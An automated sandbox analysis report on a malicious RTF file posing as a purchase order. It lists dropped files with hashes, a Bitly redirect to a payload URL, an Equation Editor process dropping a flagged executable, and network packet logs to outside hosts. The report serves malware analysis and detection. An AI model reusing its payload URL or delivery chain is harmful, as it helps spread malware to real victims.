                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...n\RK.................P...................`....@..................................J.......................................R..(....p.....................................................................(... ....................................text...DF.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3qO7045[1].htm
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:HTML document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):116
                                                                                  Entropy (8bit):4.555420363401828
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:qVvzLURODccZ/vXbvx9nDyZHL+dEJRTHsIkFSXbKFvNGb:qFzLIeco3XLx92ZHqGJVMIMSLWQb
                                                                                  MD5:5430FAE62906F346226C0F6B7EDB2505
                                                                                  SHA1:1CAB9FF7715955A9BD0C3702AF5152353BAA6901
                                                                                  SHA-256:104F6C00E1E641D26F8F4E324B88FFA7A6A825FA195DBBABA775BBD8F86EC554
                                                                                  SHA-512:FBEF7B1D0A394927CAEFF28C56E9F0ED1F59949BB964D3BC1B5C197128BC2F08FFFD97A3FA68145FD0534ABC2253277797C68A9710D605D747D7388924302EF3
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: <html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/PWua8.txt">moved here</a></body>.</html>
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{96CDA2CA-B597-4160-9AA2-9325CEFB4D67}.tmp
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1536
                                                                                  Entropy (8bit):1.3573187972516119
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbf:IiiiiiiiiifdLloZQc8++lsJe1MzM
                                                                                  MD5:ADEECB285197F0DA2AC8593087E205A2
                                                                                  SHA1:78E89DAF70658C478C753D50D4C39755F5CDCA84
                                                                                  SHA-256:4FE2B6146A5F8F2641F78A01D06063848F0790082776D94ADACD89D9A462E0E1
                                                                                  SHA-512:307F3F8621F1B9FF604041D8BC7746BBAC8C706537797E40F910625D0882BED9E2EAEEB78D801850F79EDA41D550670C72F4DE363EAE7F84E67BA93458C0CFE4
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BFBB-6C9AC8D8FC42}.tmp
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):3498022
                                                                                  Entropy (8bit):4.142539932120983
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:FDKMKEUMKOyMKwpMKMlMYkKMGMKt1MKohMHwKMe9KM6MKo9MwheQ:vQ
                                                                                  MD5:A1F0AB1026D7BD370F80083BBA7CE963
                                                                                  SHA1:32BC747DED3B2018E0856E759FF03ADEA33BF5EE
                                                                                  SHA-256:C6E3761741B575DD410FD2C5857E950F1A15F4C515FE5D32BBDA920AE9FD8B79
                                                                                  SHA-512:5493327842E3569752958E78F948FC08811790F81746834547C1BD8AA005D36C6D5C9E1ECEB12363CBF6ABBEFA61AC75354A237A493FB732F91FA0E1B5EF7E5C
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: ..@.A.p.J.n.b.S.m.E.I.k.B.Y.w.P.B.r.@.-.D.y.s.i.v.y.j.z.Z.m.o.I.e.C.P.i.F.<.e.h.&.&.0._.M.-.C._.g.-.-._.-.d.,.6.4.>.3.2.9.9.7.$.C.v.>.y.t.=.n.5.|.:.%._.>.j.n.8.%.b.m.;.=.u...2.8..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6618253-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1024
                                                                                  Entropy (8bit):0.05390218305374581
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\Cab78C9.tmp
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                  Category:dropped
                                                                                  Size (bytes):59134
                                                                                  Entropy (8bit):7.995450161616763
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                  Malicious:false
                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                  C:\Users\user\AppData\Local\Temp\Tar78CA.tmp
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):152788
                                                                                  Entropy (8bit):6.316654432555028
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                  MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                  Malicious:false
                                                                                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):104
                                                                                  Entropy (8bit):4.477506521672235
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:M16NKRAX6XDEd6lNC9KRAX6XDEd6lmX16NKRAX6XDEd6lv:M4NAAXwEAfC9AAXwEAvNAAXwEA1
                                                                                  MD5:319E61C883692B7358D466E3AD6A8B01
                                                                                  SHA1:5DD6A28A69BCFE9050F178FC3E0BA82E9E1E9CB9
                                                                                  SHA-256:FA9F64C6A6A7A55D1C25A0431BD0AFA9D82CFD15920E1142CD63A282E8939A85
                                                                                  SHA-512:2D17CE30A4187D7B32EB69A31BF983099AD433750B74183A4F7AE411EE419E669AF4EA8F0B0B1605144F875CB1B4D1CDA190C2AC01713F6A4752BAD17AB34313
                                                                                  Malicious:false
                                                                                  Preview: [doc]..purchase order_2242021.LNK=0..purchase order_2242021.LNK=0..[doc]..purchase order_2242021.LNK=0..
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\purchase order_2242021.LNK
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Wed Feb 24 20:06:36 2021, length=1797651, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):2148
                                                                                  Entropy (8bit):4.558495707581942
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:8n/XT0ZVXb+2Cw4+Qh2n/XT0ZVXb+2Cw4+Q/:8n/XuVXbM+Qh2n/XuVXbM+Q/
                                                                                  MD5:B17CF01EAFABBDBC92CA93B98A73A27E
                                                                                  SHA1:226FEC551A3022DD9EC31C81D152DB512465853C
                                                                                  SHA-256:6AE2076101B206082430CBC6AC9EE18396AB47F62953D9D24AB1C5A9E80E7C8B
                                                                                  SHA-512:4FDDC21D95242B07FDB7038FB8CEC50E25274E09093ACD08CD9C4436B769938E290BD24A58E14F5833AB31C0C45D4F5C3176D3B5D12DB8402833292952FBD22F
                                                                                  Malicious:false
                                                                                  Preview: L..................F.... ....P.{...P.{...........n...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2..n..XR. .PURCHA~1.DOC..b.......Q.y.Q.y*...8.....................p.u.r.c.h.a.s.e. .o.r.d.e.r._.2.2.4.2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\purchase order_2242021.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s.e. .o.r.d.e.r._.2.2.4.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544....
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.431160061181642
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                  Malicious:false
                                                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):2
                                                                                  Entropy (8bit):1.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Qn:Qn
                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                  Malicious:false
                                                                                  Preview: ..
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HDGNLTQS.txt
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):90
                                                                                  Entropy (8bit):4.294724337284533
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:jvdiE1C7i2JLJdvglvPRdWFYlS/n:kE1ki2JLTvgliFJn
                                                                                  MD5:60C5107F8B85546339B0AF38B517DD85
                                                                                  SHA1:4C7E105169D3E3C2608F917EEB0A76AC70247D7F
                                                                                  SHA-256:14DDA52EF4808BBBF1D30E95609E89C4E36D030D772A128405B58AA1D8F0E965
                                                                                  SHA-512:7F15E78260E2DC398DFCD0BD0054EBBF250193873B610BA668565DAA5DAA35C05EDE12696108DD019CEED954AFB5336B5674B1323D3C43AFC335ECE1EB767EFB
                                                                                  Malicious:false
                                                                                  IE Cache URL:bit.ly/
                                                                                  Preview: _bit.l1oc6O-1f1018e00109e7d832-00p.bit.ly/.1536.1517611264.30906391.1555483204.30870257.*.
                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\JOHDAECH.txt
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                  File Type:ASCII text
                                                                                  Category:downloaded
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):4.1123437507738325
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:vpqMLJUQ2arRTTG4WT/nx3SyS/n:vEMWXo1TG4UJSpn
                                                                                  MD5:52D117091370D78E57A45347984C82A7
                                                                                  SHA1:B88EAFFA9FC3F0B37D88CA795DAB3F572EE601AF
                                                                                  SHA-256:0BE8ADA46BA469AA2021090A2188B15F58BE7E1935353887AB6828EA482548F1
                                                                                  SHA-512:16A12CDCE6B48FEF53897D51A9D16AE36DD22AA730404019765140069581EA30917B0711C148008286542CE0FF83E8F2949A7770D56591967781F67E2CCC202B
                                                                                  Malicious:false
                                                                                  IE Cache URL:live.com/
                                                                                  Preview: wla42..live.com/.1536.3819446656.30871589.3600096691.30870257.*.
                                                                                  C:\Users\user\Desktop\~$rchase order_2242021.doc
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):162
                                                                                  Entropy (8bit):2.431160061181642
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                                  Malicious:false
                                                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                  C:\Users\Public\69577.exe
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):131072
                                                                                  Entropy (8bit):4.79650156443488
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:HWWTwV4fVhuy/kysvxhG7NuX40vbyovaWm5vj2kht/uxVQwV4MjW:7wVUPsyChtX40Tyova75vj2mt/QqwV
                                                                                  MD5:5D2D34449323C67BA1F5EC7561DF2204
                                                                                  SHA1:A48C7F51DB44CA8A2B0240D9C57C1983AC5D75DD
                                                                                  SHA-256:95A1FF3F5D08AC3D0DFE64300EEC668FA0C78BDB7DA395F1D91735C5A0AEF8A5
                                                                                  SHA-512:28B4C6DF609084045F866686E559C7771B6455BC8FDE56942F9422265C6ED2ACFE12EF383C23225AD171D9D7BA22EFC9EF7137C069070812AF798EDAA8AE6D73
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...n\RK.................P...................`....@..................................J.......................................R..(....p.....................................................................(... ....................................text...DF.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Rich Text Format data, unknown version
                                                                                  Entropy (8bit):6.29966086098654
                                                                                  TrID:
                                                                                  • Rich Text Format (5005/1) 55.56%
                                                                                  • Rich Text Format (4004/1) 44.44%
                                                                                  File name:purchase order_2242021.doc
                                                                                  File size:1797651
                                                                                  MD5:f0c779ec7573308d5c5bbf15762391d5
                                                                                  SHA1:6934649699360c8cf7a0d8dee37c994082268054
                                                                                  SHA256:fe38000650bb91c8e0d5aee0a0bff8136d849d58dc6f7d9f35d33788abd9a799
                                                                                  SHA512:d4adf951d8c57f8a63c0a5f9cbbb8ba56fe6820669159e879e5d29e390571c57c651f3457df60ae85e4b40fedb1d3f870af333aa4e50ad136a4f027ebe1aeede
                                                                                  SSDEEP:12288:VZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQC:V////////////////////////o545h
                                                                                  File Content Preview:{\rtf51437\page11419927264400464@ApJnbSmEIkBYwPBr@-DysivyjzZmoIeCPiF<eh&&0_M-C_g--_-d,64>32997$Cv>yt=n5|:%_>jn8%bm\mklP;=u\m3699.28.... .... ...... .... .... ....

                                                                                  File Icon

                                                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                                                  Static RTF Info

                                                                                  Objects

                                                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                  0001A47FFhno

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 24, 2021 13:06:50.302928925 CET4916780192.168.2.2267.199.248.11
                                                                                  Feb 24, 2021 13:06:50.315180063 CET804916767.199.248.11192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.315296888 CET4916780192.168.2.2267.199.248.11
                                                                                  Feb 24, 2021 13:06:50.315624952 CET4916780192.168.2.2267.199.248.11
                                                                                  Feb 24, 2021 13:06:50.327708006 CET804916767.199.248.11192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.422799110 CET804916767.199.248.11192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.422919989 CET4916780192.168.2.2267.199.248.11
                                                                                  Feb 24, 2021 13:06:50.496206045 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:50.531502962 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.531634092 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:50.541237116 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:50.578671932 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.578704119 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.578797102 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:50.592158079 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:50.628480911 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:50.628570080 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.005666018 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.139710903 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.847400904 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.847433090 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.847618103 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.847687006 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.847713947 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.847758055 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.847774029 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.847784996 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.847820044 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.848287106 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.848365068 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.848552942 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.848614931 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.848623037 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.848666906 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.848833084 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.848856926 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.848906994 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.848911047 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.848978996 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.849313974 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.849390984 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.849493027 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.849565029 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.855420113 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.882944107 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.882980108 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.882997036 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883011103 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883027077 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883121967 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883284092 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883326054 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883354902 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883378029 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883398056 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883415937 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883425951 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883449078 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883467913 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883522034 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883725882 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883748055 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883776903 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883791924 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883889914 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.883954048 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.883956909 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884004116 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884007931 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.884049892 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.884109974 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884141922 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884159088 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.884188890 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.884274960 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884299040 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884325027 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.884341002 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.884404898 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884459972 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.884481907 CET443491685.79.72.163192.168.2.22
                                                                                  Feb 24, 2021 13:06:52.884540081 CET49168443192.168.2.225.79.72.163
                                                                                  Feb 24, 2021 13:06:52.885004997 CET49168443192.168.2.225.79.72.163
